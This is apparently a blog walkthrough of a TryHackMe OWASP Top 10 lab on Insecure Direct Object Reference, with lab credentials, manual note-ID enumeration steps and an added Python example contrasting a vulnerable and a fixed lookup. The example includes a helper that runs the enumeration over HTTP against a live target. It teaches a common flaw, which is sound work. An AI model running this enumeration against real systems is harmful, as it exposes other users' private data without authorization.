Try Hack Me: OWASP Top 10 Room Day 5 of 10

lightkun_yagami
2 min read · Jul 18, 2020

This is a FREE room on Try Hack Me (you don’t need a paid subscription, just an account) that contains challenges with the goal of teaching one of the OWASP Top 10 vulnerabilities every day for 10 days in a row. The challenges are:

Day 1: Injection

Day 2: Broken Authentication

Day 3: Sensitive Data Exposure

Day 4: XML External Entity

Day 5: Broken Access Control

Day 6: Security Misconfiguration

Day 7: Cross-site Scripting

Day 8: Insecure Deserialization

Day 9: Components with Known Vulnerabilities

Day 10: Insufficient Logging & Monitoring

Today’s challenge is Day 5: Broken Access Control. I blurred the answer so you will have to do the steps yourself to reveal it.

There is only one question to answer in this challenge. (I was assigned the web server IP 10.10.60.242; check your own assigned IP address, as yours will be different from mine.)

  • Enter the username noot and the password test1234 to log in, as per the instructions. Then look for a way to exploit a broken access control flaw called Insecure Direct Object Reference (IDOR), where user-supplied input (here, a note identifier) is used to fetch an object without checking that the logged-in user is allowed to see it.
Screenshots of the steps (captions only):

  • Login screen
  • Username and password input
  • After logging in, notice the note parameter in the URL is =1
  • Changed the parameter to =2, but the page is empty
  • Changed the parameter to =3, and the page is still empty
  • Found the correct value of the parameter that contains the flag (blurred, as noted above)

An empty page just means no note was rendered for that value; the point is that the application fetches whatever note the parameter names without checking who owns it, so walking the parameter value up and down (including 0 and below) is the whole attack.
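To make the flaw concrete, here is an added example (not code from the room or from the author) that reduces it to a runnable form: a note lookup that trusts the client-supplied id, the same lookup with a server-side ownership check, and the enumeration you perform by hand in the steps above, run against both. The note store, the users, the flag text and the `http_handler` URL template, cookie and empty-page baseline are all constructed assumptions; nothing here is the room's real data.

```python
"""IDOR as the room demonstrates it, reduced to runnable form: a note lookup
that trusts the client-supplied id (vulnerable) beside one that also checks
ownership (fixed), and the enumeration a tester runs against each.
Added example; the note store, users and flag text below are constructed."""
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass(frozen=True)
class Note:
    note_id: int
    owner: str
    body: str


# Constructed sample data standing in for the room's note table (hypothetical).
NOTES: Dict[int, Note] = {
    0: Note(0, "admin", "flag{constructed-example-not-the-real-flag}"),
    1: Note(1, "noot", "noot's only note"),
    2: Note(2, "alice", "alice's private note"),
}

# A handler is called with the session's user and the id the client asked for,
# and returns the note body, or None when nothing is shown.
Handler = Callable[[str, int], Optional[str]]


def vulnerable_note(session_user: str, note_id: int) -> Optional[str]:
    """Looks the note up by id alone. session_user is never consulted, so any
    logged-in user can read any note whose id they can guess: this is the
    Insecure Direct Object Reference."""
    note = NOTES.get(note_id)
    return note.body if note else None


def fixed_note(session_user: str, note_id: int) -> Optional[str]:
    """Same lookup with a server-side authorization check. The id selects the
    object; the session, not the client, decides whether it may be read.
    Missing and unowned notes both yield None so the response does not reveal
    which ids exist."""
    note = NOTES.get(note_id)
    if note is None or note.owner != session_user:
        return None
    return note.body


def candidate_ids(seen_id: int, span: int = 3) -> List[int]:
    """Ids to try around the one the app showed us, walking both directions.
    Going below the visible id (to 0 and negatives) matters as much as going
    above it, since sequential ids usually start before the first one a fresh
    account is handed."""
    low = seen_id - span
    return [i for i in range(low, seen_id + span + 1) if i != seen_id]


def enumerate_notes(handler: Handler, session_user: str, ids: List[int]) -> Dict[int, str]:
    """Replays the manual probe from the walkthrough: same session, a different
    note id each request. Returns {id: body} for every id that produced
    content, i.e. the notes this session was able to read."""
    found: Dict[int, str] = {}
    for note_id in ids:
        body = handler(session_user, note_id)
        if body is not None:
            found[note_id] = body
    return found


def http_handler(url_template: str, cookie: str, empty_body: str) -> Handler:
    """Builds a Handler that performs the same probe over HTTP against a live
    target. url_template is assumed to contain '{id}' where the note parameter
    goes, cookie is the session cookie header value after logging in, and
    empty_body is the response for an id you already know shows nothing, so
    'empty page' is detected by comparison rather than by guessing at markup.
    All three are assumptions supplied by the tester; the session user argument
    is unused here because the cookie already fixes it."""
    def handler(_session_user: str, note_id: int) -> Optional[str]:
        req = urllib.request.Request(url_template.format(id=note_id),
                                     headers={"Cookie": cookie})
        with urllib.request.urlopen(req, timeout=10) as resp:
            body = resp.read().decode("utf-8", "replace")
        return None if body.strip() == empty_body.strip() else body
    return handler


if __name__ == "__main__":
    # Logged in as noot, the app shows note 1; probe the neighbours with each handler.
    ids = candidate_ids(seen_id=1)
    print("vulnerable:", sorted(enumerate_notes(vulnerable_note, "noot", ids)))
    print("fixed:     ", sorted(enumerate_notes(fixed_note, "noot", ids)))
```

Run as-is and the vulnerable handler hands noot the admin's and alice's notes while the fixed one returns nothing, because the fix moves the decision from the id the client controls to the session the server controls. Against the live room you would swap in `http_handler` with your own URL template and session cookie; the enumeration loop stays the same.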

It is free to sign up for an account. Visit https://tryhackme.com
